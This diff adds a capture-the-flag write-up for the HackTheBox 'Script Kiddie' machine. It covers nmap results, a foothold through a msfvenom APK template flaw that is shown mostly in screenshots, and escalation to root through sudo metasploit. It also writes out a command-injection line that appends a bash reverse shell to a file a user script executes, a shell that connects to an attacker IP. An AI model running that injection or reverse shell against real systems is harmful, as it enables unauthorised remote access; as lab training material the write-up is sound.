mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Add files via upload
This commit is contained in:
parent
5d053233dc
commit
73083ef646
1 changed files with 106 additions and 0 deletions
106
HackTheBox/Script_Kiddie.md
Normal file
106
HackTheBox/Script_Kiddie.md
Normal file
|
@ -0,0 +1,106 @@
|
|||
# HackTheBox-Script Kiddie
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
|
||||
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
|
||||
NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
|
||||
Nmap scan report for 10.10.10.226
|
||||
Host is up (0.21s latency).
|
||||
|
||||
PORT STATE SERVICE VERSION
|
||||
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|
||||
4444/tcp open krb524?
|
||||
| fingerprint-strings:
|
||||
| GetRequest, NULL:
|
||||
| eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
|
||||
rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
|
||||
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|
||||
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|
||||
|_http-title: k1d'5 h4ck3r t00l5
|
||||
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
|
||||
|
||||
```
|
||||
|
||||
## PORT 5000 (HTTP)
|
||||
|
||||
<img src="https://imgur.com/NLLAJJ1.png"/>
|
||||
|
||||
Here we can do an nmap scan on the machine but if we try to run bash commands it won't work
|
||||
|
||||
<img src="https://imgur.com/QXOmFOU.png"/>
|
||||
|
||||
<img src="https://imgur.com/n5mThGc.png"/>
|
||||
|
||||
Similarly with the msfvenom and searchsploit
|
||||
|
||||
<img src="https://imgur.com/BzJTgtb.png"/>
|
||||
|
||||
Msfvenom successfully generetes payload
|
||||
|
||||
<img src="https://imgur.com/WsEp93j.png"/>
|
||||
|
||||
But only windows and android payload generates
|
||||
|
||||
<img src="https://imgur.com/gdGJrIu.png"/>
|
||||
|
||||
|
||||
Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that `msfvenom` recently had a vulnerability in the process generating payload
|
||||
|
||||
<img src="https://imgur.com/JtdAtf1.png"/>
|
||||
|
||||
<img src="https://imgur.com/7PyVLu3.png"/>
|
||||
|
||||
This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder
|
||||
|
||||
`gem update`
|
||||
`cd /usr/share/metasploit-framework`
|
||||
`sudo nano Gemfile.lock` (update reline version in that file this important before bundle install)
|
||||
`sudo bundle install` ( in metasploit folder)
|
||||
|
||||
<img src="https://imgur.com/8Q46lfu.png"/>
|
||||
|
||||
<img src="https://imgur.com/0LR7Eg9.png"/>
|
||||
|
||||
<img src="https://imgur.com/B2pigeV.png"/>
|
||||
|
||||
Upload the apk file on the website
|
||||
|
||||
<img src="https://imgur.com/HCj6XEo.png"/>
|
||||
|
||||
<img src="https://imgur.com/DD2Z1sO.png"/>
|
||||
|
||||
And you'll get a shell so we will need to stabilize it
|
||||
|
||||
<img src="https://imgur.com/1MOGsiD.png"/>
|
||||
|
||||
Going to `pwn`'s home directory we see a bash script `scanlosers.sh` which was reading a script file from `kid`'s home directory and execute it
|
||||
|
||||
<img src="https://imgur.com/4vBH6TR.png"/>
|
||||
|
||||
Seeing that file belongs to `pwn`'s group
|
||||
|
||||
<img src="https://imgur.com/sOM8Kfa.png"/>
|
||||
|
||||
We can edit this with a bash reverse shell , this is the way the payload needs to be crafted.
|
||||
|
||||
`echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers`
|
||||
|
||||
<img src="https://imgur.com/DcTRUUb.png"/>
|
||||
|
||||
Doing `sudo -l`
|
||||
|
||||
<img src="https://imgur.com/lwZ1jUB.png"/>
|
||||
|
||||
Running metasploit as `sudo`
|
||||
|
||||
<img src="https://imgur.com/CVSx2Ia.png"/>
|
||||
|
||||
We can now run commands as `root`
|
||||
|
||||
<img src="https://imgur.com/ZE6bFiQ.png"/>
|
||||
|
||||
<img src="https://imgur.com/r0Xsgrw.png"/>
|
Loading…
Reference in a new issue